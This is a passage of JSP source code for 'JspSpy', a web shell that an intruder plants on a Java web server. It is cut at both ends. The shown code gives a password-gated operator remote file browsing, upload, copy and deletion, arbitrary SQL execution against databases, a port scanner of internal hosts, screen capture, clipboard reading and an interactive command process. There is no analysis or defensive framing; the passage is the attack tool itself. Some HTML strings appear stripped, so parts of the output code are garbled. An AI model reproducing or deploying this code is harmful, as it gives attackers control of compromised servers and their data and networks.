"ISO-8859-1"; 20 | private static final String PAGE_CHARSET = "UTF-8"; 21 | private static final String CURRENT_DIR = "currentdir"; 22 | private static final String MSG = "SHOWMSG"; 23 | private static final String PORT_MAP = "PMSA"; 24 | private static final String DBO = "DBO"; 25 | private static final String SHELL_ONLINE = "SHELL_ONLINE"; 26 | private static String SHELL_NAME = ""; 27 | private static String WEB_ROOT = null; 28 | private static String SHELL_DIR = null; 29 | public static Map ins = new HashMap(); 30 | private static class MyRequest extends HttpServletRequestWrapper { 31 | public MyRequest(HttpServletRequest req) { 32 | super(req); 33 | } 34 | public String getParameter(String name) { 35 | try { 36 | String value = super.getParameter(name); 37 | if (name == null) 38 | return null; 39 | return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); 40 | } catch (Exception e) { 41 | return null; 42 | } 43 | } 44 | } 45 | private static class DBOperator{ 46 | private Connection conn = null; 47 | private Statement stmt = null; 48 | private String driver; 49 | private String url; 50 | private String uid; 51 | private String pwd; 52 | public DBOperator(String driver,String url,String uid,String pwd) throws Exception { 53 | this(driver,url,uid,pwd,false); 54 | } 55 | public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { 56 | Class.forName(driver); 57 | if (connect) 58 | this.conn = DriverManager.getConnection(url,uid,pwd); 59 | this.url = url; 60 | this.driver = driver; 61 | this.uid = uid; 62 | this.pwd = pwd; 63 | } 64 | public void connect() throws Exception{ 65 | this.conn = DriverManager.getConnection(url,uid,pwd); 66 | } 67 | public Object execute(String sql) throws Exception { 68 | if (isValid()) { 69 | stmt = conn.createStatement(); 70 | if (stmt.execute(sql)) { 71 | return stmt.getResultSet(); 72 | } else { 73 | return stmt.getUpdateCount(); 74 | } 75 | } 76 | throw new Exception("Connection is inValid."); 77 | } 78 | public void closeStmt() throws Exception{ 79 | if (this.stmt != null) 80 | stmt.close(); 81 | } 82 | public boolean isValid() throws Exception { 83 | return conn != null && !conn.isClosed(); 84 | } 85 | public void close() throws Exception { 86 | if (isValid()) { 87 | closeStmt(); 88 | conn.close(); 89 | } 90 | } 91 | public boolean equals(Object o) { 92 | if (o instanceof DBOperator) { 93 | DBOperator dbo = (DBOperator)o; 94 | return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); 95 | } 96 | return false; 97 | } 98 | } 99 | private static class StreamConnector extends Thread { 100 | private InputStream is; 101 | private OutputStream os; 102 | public StreamConnector( InputStream is, OutputStream os ){ 103 | this.is = is; 104 | this.os = os; 105 | } 106 | public void run(){ 107 | BufferedReader in = null; 108 | BufferedWriter out = null; 109 | try{ 110 | in = new BufferedReader( new InputStreamReader(this.is)); 111 | out = new BufferedWriter( new OutputStreamWriter(this.os)); 112 | char buffer[] = new char[8192]; 113 | int length; 114 | while((length = in.read( buffer, 0, buffer.length ))>0){ 115 | out.write( buffer, 0, length ); 116 | out.flush(); 117 | } 118 | } catch(Exception e){} 119 | try{ 120 | if(in != null) 121 | in.close(); 122 | if(out != null) 123 | out.close(); 124 | } catch( Exception e ){} 125 | } 126 | } 127 | private static class OnLineProcess { 128 | private String cmd = "first"; 129 | private Process pro; 130 | public OnLineProcess(Process p){ 131 | this.pro = p; 132 | } 133 | public void setPro(Process p) { 134 | this.pro = p; 135 | } 136 | public void setCmd(String c){ 137 | this.cmd = c; 138 | } 139 | public String getCmd(){ 140 | return this.cmd; 141 | } 142 | public Process getPro(){ 143 | return this.pro; 144 | } 145 | public void stop(){ 146 | this.pro.destroy(); 147 | } 148 | } 149 | private static class OnLineConnector extends Thread { 150 | private OnLineProcess ol = null; 151 | private InputStream is; 152 | private OutputStream os; 153 | private String name; 154 | public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ 155 | this.is = is; 156 | this.os = os; 157 | this.name = name; 158 | this.ol = ol; 159 | } 160 | public void run(){ 161 | BufferedReader in = null; 162 | BufferedWriter out = null; 163 | try{ 164 | in = new BufferedReader( new InputStreamReader(this.is)); 165 | out = new BufferedWriter( new OutputStreamWriter(this.os)); 166 | char buffer[] = new char[128]; 167 | if(this.name.equals("exeRclientO")) { 168 | //from exe to client 169 | int length = 0; 170 | while((length = in.read( buffer, 0, buffer.length ))>0){ 171 | String str = new String(buffer, 0, length); 172 | str = str.replace("&","&").replace("<","<").replace(">",">"); 173 | str = str.replace(""+(char)13+(char)10,"
"); 174 | str = str.replace("\n","
"); 175 | out.write(str.toCharArray(), 0, str.length()); 176 | out.flush(); 177 | } 178 | } else { 179 | //from client to exe 180 | while(true) { 181 | while(this.ol.getCmd() == null) { 182 | Thread.sleep(500); 183 | } 184 | if (this.ol.getCmd().equals("first")) { 185 | this.ol.setCmd(null); 186 | continue; 187 | } 188 | this.ol.setCmd(this.ol.getCmd() + (char)10); 189 | char[] arr = this.ol.getCmd().toCharArray(); 190 | out.write(arr,0,arr.length); 191 | out.flush(); 192 | this.ol.setCmd(null); 193 | } 194 | } 195 | } catch(Exception e){ 196 | } 197 | try{ 198 | if(in != null) 199 | in.close(); 200 | if(out != null) 201 | out.close(); 202 | } catch( Exception e ){ 203 | } 204 | } 205 | } 206 | private static class Table{ 207 | private ArrayList rows = null; 208 | private boolean echoTableTag = false; 209 | public void setEchoTableTag(boolean v) { 210 | this.echoTableTag = v; 211 | } 212 | public Table(){ 213 | this.rows = new ArrayList(); 214 | } 215 | public void addRow(Row r) { 216 | this.rows.add(r); 217 | } 218 | public String toString(){ 219 | StringBuilder html = new StringBuilder(); 220 | if (echoTableTag) 221 | html.append(""); 222 | for (Row r:rows) { 223 | html.append(""); 224 | for (Column c:r.getColumns()) { 225 | html.append(""); 231 | } 232 | html.append(""); 233 | } 234 | if (echoTableTag) 235 | html.append("
"); 226 | String vv = Util.htmlEncode(Util.getStr(c.getValue())); 227 | if (vv.equals("")) 228 | vv = " "; 229 | html.append(vv); 230 | html.append("
"); 236 | return html.toString(); 237 | } 238 | } 239 | private static class Row{ 240 | private ArrayList cols = null; 241 | public Row(){ 242 | this.cols = new ArrayList(); 243 | } 244 | public void addColumn(Column n) { 245 | this.cols.add(n); 246 | } 247 | public ArrayList getColumns(){ 248 | return this.cols; 249 | } 250 | } 251 | private static class Column{ 252 | private String value; 253 | public Column(String v){ 254 | this.value = v; 255 | } 256 | public String getValue(){ 257 | return this.value; 258 | } 259 | } 260 | private static class Util{ 261 | public static boolean isEmpty(String s) { 262 | return s == null || s.trim().equals(""); 263 | } 264 | public static boolean isEmpty(Object o) { 265 | return o == null || isEmpty(o.toString()); 266 | } 267 | public static String getSize(long size,char danwei) { 268 | if (danwei == 'M') { 269 | double v = formatNumber(size / 1024.0 / 1024.0,2); 270 | if (v > 1024) { 271 | return getSize(size,'G'); 272 | }else { 273 | return v + "M"; 274 | } 275 | } else if (danwei == 'G') { 276 | return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; 277 | } else if (danwei == 'K') { 278 | double v = formatNumber(size / 1024.0,2); 279 | if (v > 1024) { 280 | return getSize(size,'M'); 281 | } else { 282 | return v + "K"; 283 | } 284 | } else if (danwei == 'B') { 285 | if (size > 1024) { 286 | return getSize(size,'K'); 287 | }else { 288 | return size + "B"; 289 | } 290 | } 291 | return ""+0+danwei; 292 | } 293 | public static double formatNumber(double value,int l) { 294 | NumberFormat format = NumberFormat.getInstance(); 295 | format.setMaximumFractionDigits(l); 296 | format.setGroupingUsed(false); 297 | return new Double(format.format(value)); 298 | } 299 | public static boolean isInteger(String v) { 300 | if (isEmpty(v)) 301 | return false; 302 | return v.matches("^\\d+$"); 303 | } 304 | public static String formatDate(long time) { 305 | SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); 306 | return format.format(new java.util.Date(time)); 307 | } 308 | public static String convertPath(String path) { 309 | return path != null ? path.replace("\\","/") : ""; 310 | } 311 | public static String htmlEncode(String v) { 312 | if (isEmpty(v)) 313 | return ""; 314 | return v.replace("&","&").replace("<","<").replace(">",">"); 315 | } 316 | public static String getStr(String s) { 317 | return s == null ? "" :s; 318 | } 319 | public static String getStr(Object s) { 320 | return s == null ? "" :s.toString(); 321 | } 322 | public static String exec(String regex, String str, int group) { 323 | Pattern pat = Pattern.compile(regex); 324 | Matcher m = pat.matcher(str); 325 | if (m.find()) 326 | return m.group(group); 327 | return null; 328 | } 329 | public static void outMsg(Writer out,String msg) throws Exception { 330 | outMsg(out,msg,"center"); 331 | } 332 | public static void outMsg(Writer out,String msg,String align) throws Exception { 333 | if (msg.indexOf("java.lang.ClassNotFoundException") != -1) 334 | msg = "Can Not Find The Driver!
" + msg; 335 | out.write("
"+msg+"
"); 336 | } 337 | } 338 | private static class UploadBean { 339 | private String fileName = null; 340 | private String suffix = null; 341 | private String savePath = ""; 342 | private ServletInputStream sis = null; 343 | private byte[] b = new byte[1024]; 344 | public UploadBean() { 345 | } 346 | public void setSavePath(String path) { 347 | this.savePath = path; 348 | } 349 | public void parseRequest(HttpServletRequest request) throws IOException { 350 | sis = request.getInputStream(); 351 | int a = 0; 352 | int k = 0; 353 | String s = ""; 354 | while ((a = sis.readLine(b,0,b.length))!= -1) { 355 | s = new String(b, 0, a,PAGE_CHARSET); 356 | if ((k = s.indexOf("filename=\""))!= -1) { 357 | s = s.substring(k + 10); 358 | k = s.indexOf("\""); 359 | s = s.substring(0, k); 360 | File tF = new File(s); 361 | if (tF.isAbsolute()) { 362 | fileName = tF.getName(); 363 | } else { 364 | fileName = s; 365 | } 366 | k = s.lastIndexOf("."); 367 | suffix = s.substring(k + 1); 368 | upload(); 369 | } 370 | } 371 | } 372 | private void upload() { 373 | try { 374 | FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); 375 | int a = 0; 376 | int k = 0; 377 | String s = ""; 378 | while ((a = sis.readLine(b,0,b.length))!=-1) { 379 | s = new String(b, 0, a); 380 | if ((k = s.indexOf("Content-Type:"))!=-1) { 381 | break; 382 | } 383 | } 384 | sis.readLine(b,0,b.length); 385 | while ((a = sis.readLine(b,0,b.length)) != -1) { 386 | s = new String(b, 0, a); 387 | if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { 388 | break; 389 | } 390 | out.write(b, 0, a); 391 | } 392 | out.close(); 393 | } catch (IOException ioe) { 394 | ioe.printStackTrace(); 395 | } 396 | } 397 | } 398 | %> 399 | <% 400 | SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); 401 | String myAbsolutePath = application.getRealPath(request.getServletPath()); 402 | if (Util.isEmpty(myAbsolutePath)) {//for weblogic 403 | SHELL_NAME = request.getServletPath(); 404 | myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); 405 | SHELL_NAME=request.getContextPath()+SHELL_NAME; 406 | WEB_ROOT = new File(application.getResource("/").getPath()).toString(); 407 | } else { 408 | WEB_ROOT = application.getRealPath("/"); 409 | } 410 | SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); 411 | if (session.getAttribute(CURRENT_DIR) == null) 412 | session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); 413 | request = new MyRequest(request); 414 | if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { 415 | String o = request.getParameter("o"); 416 | if (o != null && o.equals("login")) { 417 | ins.get("login").invoke(request,response,session); 418 | return; 419 | } else if (o != null && o.equals("vLogin")) { 420 | ins.get("vLogin").invoke(request,response,session); 421 | return; 422 | } else { 423 | response.sendRedirect(SHELL_NAME+"?o=vLogin"); 424 | return; 425 | } 426 | } 427 | %> 428 | <%! 429 | private static interface Invoker { 430 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; 431 | public boolean doBefore(); 432 | public boolean doAfter(); 433 | } 434 | private static class DefaultInvoker implements Invoker{ 435 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { 436 | } 437 | public boolean doBefore(){ 438 | return true; 439 | } 440 | public boolean doAfter() { 441 | return true; 442 | } 443 | } 444 | private static class ScriptInvoker extends DefaultInvoker{ 445 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 446 | try { 447 | PrintWriter out = response.getWriter(); 448 | out.println(""); 545 | 546 | } catch (Exception e) { 547 | e.printStackTrace(); 548 | throw e ; 549 | } 550 | } 551 | } 552 | private static class BeforeInvoker extends DefaultInvoker { 553 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 554 | try { 555 | PrintWriter out = response.getWriter(); 556 | out.println("JspSpy"); 574 | } catch (Exception e) { 575 | e.printStackTrace(); 576 | throw e ; 577 | } 578 | } 579 | } 580 | private static class AfterInvoker extends DefaultInvoker { 581 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 582 | try { 583 | PrintWriter out = response.getWriter(); 584 | out.println(""); 585 | } catch (Exception e) { 586 | e.printStackTrace(); 587 | throw e ; 588 | } 589 | } 590 | } 591 | private static class DeleteBatchInvoker extends DefaultInvoker { 592 | public boolean doBefore(){return false;} 593 | public boolean doAfter(){return false;} 594 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 595 | try { 596 | String files = request.getParameter("files"); 597 | if (!Util.isEmpty(files)) { 598 | String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); 599 | String[] arr = files.split(","); 600 | for (String fs:arr) { 601 | File f = new File(currentDir,fs); 602 | f.delete(); 603 | } 604 | } 605 | JSession.setAttribute(MSG,"Delete Files Success!"); 606 | response.sendRedirect(SHELL_NAME+"?o=index"); 607 | } catch (Exception e) { 608 | e.printStackTrace(); 609 | throw e ; 610 | } 611 | } 612 | } 613 | private static class ClipBoardInvoker extends DefaultInvoker { 614 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 615 | try { 616 | PrintWriter out = response.getWriter(); 617 | out.println(""+ 618 | " "+ 619 | " "+ 631 | " "+ 632 | "
"+ 620 | "

System Clipboard »

"+ 621 | "

");
 622 | try{
 623 | out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
 624 | }catch (Exception ex) {
 625 | out.println("ClipBoard is Empty Or Is Not Text Data !");
 626 | }
 627 | out.println("
"+ 628 | " "+ 629 | "

"+ 630 | "
"); 633 | } catch (Exception e) { 634 | e.printStackTrace(); 635 | throw e ; 636 | } 637 | } 638 | } 639 | private static class VRemoteControlInvoker extends DefaultInvoker { 640 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 641 | try { 642 | PrintWriter out = response.getWriter(); 643 | out.println(""); 666 | out.println(""+ 667 | " "+ 668 | " "+ 673 | " "+ 674 | "
"+ 669 | "

Remote Control »

"+ 670 | " Speed(Second , dont be so fast) Can Not Control Yet."+ 671 | "

"+ 672 | "
"); 675 | } catch (Exception e) { 676 | e.printStackTrace(); 677 | throw e ; 678 | } 679 | } 680 | } 681 | //GetScreen 682 | private static class GcInvoker extends DefaultInvoker { 683 | public boolean doBefore(){return false;} 684 | public boolean doAfter(){return false;} 685 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 686 | try { 687 | Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); 688 | Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); 689 | BufferedImage img = new Robot().createScreenCapture(rec); 690 | response.setContentType("image/jpeg"); 691 | ImageIO.write(img,"jpg",response.getOutputStream()); 692 | } catch (Exception e) { 693 | e.printStackTrace(); 694 | throw e ; 695 | } 696 | } 697 | } 698 | private static class VPortScanInvoker extends DefaultInvoker { 699 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 700 | try { 701 | PrintWriter out = response.getWriter(); 702 | String ip = request.getParameter("ip"); 703 | String ports = request.getParameter("ports"); 704 | String timeout = request.getParameter("timeout"); 705 | if (Util.isEmpty(ip)) 706 | ip = "127.0.0.1"; 707 | if (Util.isEmpty(ports)) 708 | ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; 709 | if (Util.isEmpty(timeout)) 710 | timeout = "2"; 711 | out.println("
"+ 712 | "

PortScan >>

"+ 713 | "
"+ 714 | "

"+ 715 | "IP : Port : Timeout (秒) : "+ 716 | "

"+ 717 | "
"+ 718 | "
"); 719 | } catch (Exception e) { 720 | e.printStackTrace(); 721 | throw e ; 722 | } 723 | } 724 | } 725 | private static class PortScanInvoker extends DefaultInvoker { 726 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 727 | try { 728 | PrintWriter out = response.getWriter(); 729 | ins.get("vPortScan").invoke(request,response,JSession); 730 | String ip = request.getParameter("ip"); 731 | String ports = request.getParameter("ports"); 732 | String timeout = request.getParameter("timeout"); 733 | int iTimeout = 0; 734 | if (Util.isEmpty(ip) || Util.isEmpty(ports)) 735 | return; 736 | if (!Util.isInteger(timeout)) { 737 | timeout = "2"; 738 | } 739 | iTimeout = Integer.parseInt(timeout); 740 | Map rs = new LinkedHashMap(); 741 | String[] portArr = ports.split(","); 742 | for (String port:portArr) { 743 | try { 744 | Socket s = new Socket(); 745 | s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); 746 | s.close(); 747 | rs.put(port,"Open"); 748 | } catch (Exception e) { 749 | rs.put(port,"Close"); 750 | } 751 | } 752 | out.println("
"); 753 | Set> entrySet = rs.entrySet(); 754 | for (Map.Entry e:entrySet) { 755 | String port = e.getKey(); 756 | String value = e.getValue(); 757 | out.println(ip+" : "+port+" ................................. "+value+"
"); 758 | } 759 | out.println("
"); 760 | } catch (Exception e) { 761 | e.printStackTrace(); 762 | throw e ; 763 | } 764 | } 765 | } 766 | private static class VConnInvoker extends DefaultInvoker { 767 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 768 | try { 769 | PrintWriter out = response.getWriter(); 770 | Object obj = JSession.getAttribute(DBO); 771 | if (obj == null || !((DBOperator)obj).isValid()) { 772 | out.println(" "); 781 | out.println("
"+ 782 | "
"+ 783 | ""+ 784 | "

DataBase Manager »

"+ 785 | ""+ 786 | "

"+ 787 | "Driver:"+ 788 | " "+ 789 | "URL:"+ 790 | ""+ 791 | "UID:"+ 792 | ""+ 793 | "PWD:"+ 794 | ""+ 795 | "DataBase:"+ 796 | " "+ 803 | ""+ 804 | "

"+ 805 | "
"); 806 | } else { 807 | ins.get("dbc").invoke(request,response,JSession); 808 | } 809 | } catch (Exception e) { 810 | e.printStackTrace(); 811 | throw e ; 812 | } 813 | } 814 | } 815 | //DBConnect 816 | private static class DbcInvoker extends DefaultInvoker { 817 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 818 | try { 819 | PrintWriter out = response.getWriter(); 820 | String driver = request.getParameter("driver"); 821 | String url = request.getParameter("url"); 822 | String uid = request.getParameter("uid"); 823 | String pwd = request.getParameter("pwd"); 824 | String sql = request.getParameter("sql"); 825 | String selectDb = request.getParameter("selectDb"); 826 | if (selectDb == null) 827 | selectDb = JSession.getAttribute("selectDb").toString(); 828 | else 829 | JSession.setAttribute("selectDb",selectDb); 830 | Object dbo = JSession.getAttribute(DBO); 831 | if (dbo == null || !((DBOperator)dbo).isValid()) { 832 | if (dbo != null) 833 | ((DBOperator)dbo).close(); 834 | dbo = new DBOperator(driver,url,uid,pwd,true); 835 | } else { 836 | if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { 837 | DBOperator oldDbo = (DBOperator)dbo; 838 | dbo = new DBOperator(driver,url,uid,pwd); 839 | if (!oldDbo.equals(dbo)) { 840 | ((DBOperator)oldDbo).close(); 841 | ((DBOperator)dbo).connect(); 842 | } else { 843 | dbo = oldDbo; 844 | } 845 | } 846 | } 847 | DBOperator Ddbo = (DBOperator)dbo; 848 | JSession.setAttribute(DBO,Ddbo); 849 | Util.outMsg(out,"Connect To DataBase Success!"); 850 | out.println(" "); 862 | out.println("
"+ 863 | "
"+ 864 | ""+ 865 | "

DataBase Manager »

"+ 866 | ""+ 867 | "

"+ 868 | "Driver:"+ 869 | " "+ 870 | "URL:"+ 871 | ""+ 872 | "UID:"+ 873 | ""+ 874 | "PWD:"+ 875 | ""+ 876 | "DataBase:"+ 877 | " "+ 884 | ""+ 885 | "

"+ 886 | "
"); 887 | out.println("
"+ 888 | "

Run SQL query/queries on database :

"); 889 | } catch (Exception e) { 890 | //e.printStackTrace(); 891 | throw e; 892 | } 893 | } 894 | } 895 | private static class ExecuteSQLInvoker extends DefaultInvoker{ 896 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 897 | try { 898 | PrintWriter out = response.getWriter(); 899 | String sql = request.getParameter("sql"); 900 | String db = request.getParameter("selectDb"); 901 | Object dbo = JSession.getAttribute(DBO); 902 | if (!Util.isEmpty(sql)) { 903 | if (dbo == null || !((DBOperator)dbo).isValid()) { 904 | response.sendRedirect(SHELL_NAME+"?o=vConn"); 905 | } else { 906 | ins.get("dbc").invoke(request,response,JSession); 907 | Object obj = ((DBOperator)dbo).execute(sql); 908 | if (obj instanceof ResultSet) { 909 | ResultSet rs = (ResultSet)obj; 910 | ResultSetMetaData meta = rs.getMetaData(); 911 | int colCount = meta.getColumnCount(); 912 | out.println("

Query#0 : "+Util.htmlEncode(sql)+"

"); 913 | out.println(""); 914 | for (int i=1;i<=colCount;i++) { 915 | out.println(""); 916 | } 917 | out.println(""); 918 | Table tb = new Table(); 919 | while(rs.next()) { 920 | Row r = new Row(); 921 | for (int i = 1;i<=colCount;i++) { 922 | r.addColumn(new Column(rs.getString(i))); 923 | } 924 | tb.addRow(r); 925 | } 926 | out.println(tb.toString()); 927 | out.println("
"+meta.getColumnName(i)+"
"+meta.getColumnTypeName(i)+"
"); 928 | rs.close(); 929 | ((DBOperator)dbo).closeStmt(); 930 | } else { 931 | out.println("

affected rows : "+obj+"

"); 932 | } 933 | } 934 | } else { 935 | ins.get("dbc").invoke(request,response,JSession); 936 | } 937 | } catch (Exception e) { 938 | e.printStackTrace(); 939 | throw e ; 940 | } 941 | } 942 | } 943 | private static class VLoginInvoker extends DefaultInvoker { 944 | public boolean doBefore() {return false;} 945 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 946 | try { 947 | PrintWriter out = response.getWriter(); 948 | out.println("
"+ 952 | "

Password: "+ 953 | " "+ 954 | " "+ 955 | " "+ 956 | "

"+ 957 | " "+ 958 | "Copyright © 2017 Helen www.baidu.com

"+ 959 | "
"); 960 | } catch (Exception e) { 961 | e.printStackTrace(); 962 | throw e ; 963 | } 964 | } 965 | } 966 | private static class LoginInvoker extends DefaultInvoker{ 967 | public boolean doBefore() {return false;} 968 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 969 | try { 970 | String inputPw = request.getParameter("pw"); 971 | if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { 972 | response.sendRedirect(SHELL_NAME+"?o=vLogin"); 973 | return; 974 | } else { 975 | JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); 976 | response.sendRedirect(SHELL_NAME+"?o=index"); 977 | return; 978 | } 979 | } catch (Exception e) { 980 | e.printStackTrace(); 981 | throw e ; 982 | } 983 | } 984 | } 985 | private static class MyComparator implements Comparator{ 986 | public int compare(File f1,File f2) { 987 | if (f1 != null && f2!= null) { 988 | if (f1.isDirectory()) { 989 | if (f2.isDirectory()) { 990 | return f1.getName().compareTo(f2.getName()); 991 | } else { 992 | return -1; 993 | } 994 | } else { 995 | if (f2.isDirectory()) { 996 | return 1; 997 | } else { 998 | return f1.getName().compareTo(f2.getName()); 999 | } 1000 | } 1001 | } 1002 | return 0; 1003 | } 1004 | } 1005 | private static class FileListInvoker extends DefaultInvoker { 1006 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { 1007 | try { 1008 | PrintWriter out = response.getWriter(); 1009 | String path = request.getParameter("folder"); 1010 | if (Util.isEmpty(path)) 1011 | path = JSession.getAttribute(CURRENT_DIR).toString(); 1012 | 1013 | JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); 1014 | File file = new File(path); 1015 | if (!file.exists()) { 1016 | throw new Exception(path+"Dont Exists !"); 1017 | } 1018 | JSession.setAttribute(CURRENT_DIR,path); 1019 | File[] list = file.listFiles(); 1020 | Arrays.sort(list,new MyComparator()); 1021 | out.println("
"); 1022 | String cr = null; 1023 | try { 1024 | cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); 1025 | }catch(Exception e) { 1026 | cr = "/"; 1027 | } 1028 | File currentRoot = new File(cr); 1029 | out.println("

File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total "+Util.getSize(currentRoot.getTotalSpace(),'G')+"

"); 1030 | out.println("
"+ 1031 | ""+ 1032 | " "+ 1033 | " "+ 1034 | " "+ 1035 | " "+ 1036 | " "+ 1037 | "
Current Directory
"+ 1038 | "
"); 1039 | out.println(""+ 1040 | ""+ 1055 | ""+ 1056 | ""+ 1057 | " "+ 1058 | " "+ 1059 | " "+ 1060 | " "+ 1061 | " "+ 1062 | ""); 1063 | if (file.getParent() != null) { 1064 | out.println(""+ 1065 | ""+ 1066 | ""+ 1067 | ""); 1068 | } 1069 | int dircount = 0; 1070 | int filecount = 0; 1071 | for (File f:list) { 1072 | if (f.isDirectory()) { 1073 | dircount ++; 1074 | out.println(""+ 1075 | ""+ 1076 | ""+ 1077 | ""+ 1078 | ""+ 1079 | ""+ 1080 | ""+ 1081 | ""); 1082 | } else { 1083 | filecount++; 1084 | out.println(""+ 1085 | ""+ 1086 | ""+ 1087 | ""+ 1088 | ""+ 1089 | ""+ 1091 | ""+ 1105 | ""); 1106 | } 1107 | } 1108 | out.println(""+ 1109 | " "+ 1110 | " "+ 1111 | "
"+ 1041 | "
"+ 1042 | "Web Root"+ 1043 | " | Shell Directory"+ 1044 | " | New Directory | New File"+ 1045 | " | "); 1046 | File[] roots = file.listRoots(); 1047 | for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); 1050 | if (i != roots.length -1) { 1051 | out.println("|"); 1052 | } 1053 | } 1054 | out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"Del | Move | Pack
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ 1090 | ""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+""+ 1092 | "Edit | "+ 1093 | "Down | "+ 1094 | "Copy | "+ 1095 | "Move | "+ 1096 | "Property"); 1097 | if (f.getName().endsWith(".zip")) { 1098 | out.println(" | UnPack"); 1099 | } else if (f.getName().endsWith(".rar")) { 1100 | out.println(" | UnPack"); 1101 | } else { 1102 | out.println(" | Pack"); 1103 | } 1104 | out.println("
 Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
"); 1112 | out.println("
"); 1113 | } catch (Exception e) { 1114 | e.printStackTrace(); 1115 | throw e; 1116 | } 1117 | } 1118 | } 1119 | private static class LogoutInvoker extends DefaultInvoker { 1120 | public boolean doBefore() {return false;} 1121 | public boolean doAfter() {return false;} 1122 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1123 | try { 1124 | Object dbo = JSession.getAttribute(DBO); 1125 | if (dbo != null) 1126 | ((DBOperator)dbo).close(); 1127 | Object obj = JSession.getAttribute(PORT_MAP); 1128 | if (obj != null) { 1129 | ServerSocket s = (ServerSocket)obj; 1130 | s.close(); 1131 | } 1132 | Object online = JSession.getAttribute(SHELL_ONLINE); 1133 | if (online != null) 1134 | ((OnLineProcess)online).stop(); 1135 | JSession.invalidate(); 1136 | response.sendRedirect(SHELL_NAME+"?o=vLogin"); 1137 | } catch (Exception e) { 1138 | e.printStackTrace(); 1139 | throw e ; 1140 | } 1141 | } 1142 | } 1143 | private static class UploadInvoker extends DefaultInvoker { 1144 | public boolean doBefore() {return false;} 1145 | public boolean doAfter() {return false;} 1146 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1147 | try { 1148 | UploadBean fileBean = new UploadBean(); 1149 | response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); 1150 | fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); 1151 | fileBean.parseRequest(request); 1152 | JSession.setAttribute(MSG,"Upload File Success!"); 1153 | response.sendRedirect(SHELL_NAME+"?o=index"); 1154 | } catch (Exception e) { 1155 | e.printStackTrace(); 1156 | throw e ; 1157 | } 1158 | } 1159 | } 1160 | private static class CopyInvoker extends DefaultInvoker { 1161 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1162 | try { 1163 | String src = request.getParameter("src"); 1164 | String to = request.getParameter("to"); 1165 | BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); 1166 | BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); 1167 | byte[] d = new byte[1024]; 1168 | int len = input.read(d); 1169 | while(len != -1) { 1170 | output.write(d,0,len); 1171 | len = input.read(d); 1172 | } 1173 | output.close(); 1174 | input.close(); 1175 | JSession.setAttribute(MSG,"Copy File Success!"); 1176 | response.sendRedirect(SHELL_NAME+"?o=index"); 1177 | } catch (Exception e) { 1178 | e.printStackTrace(); 1179 | 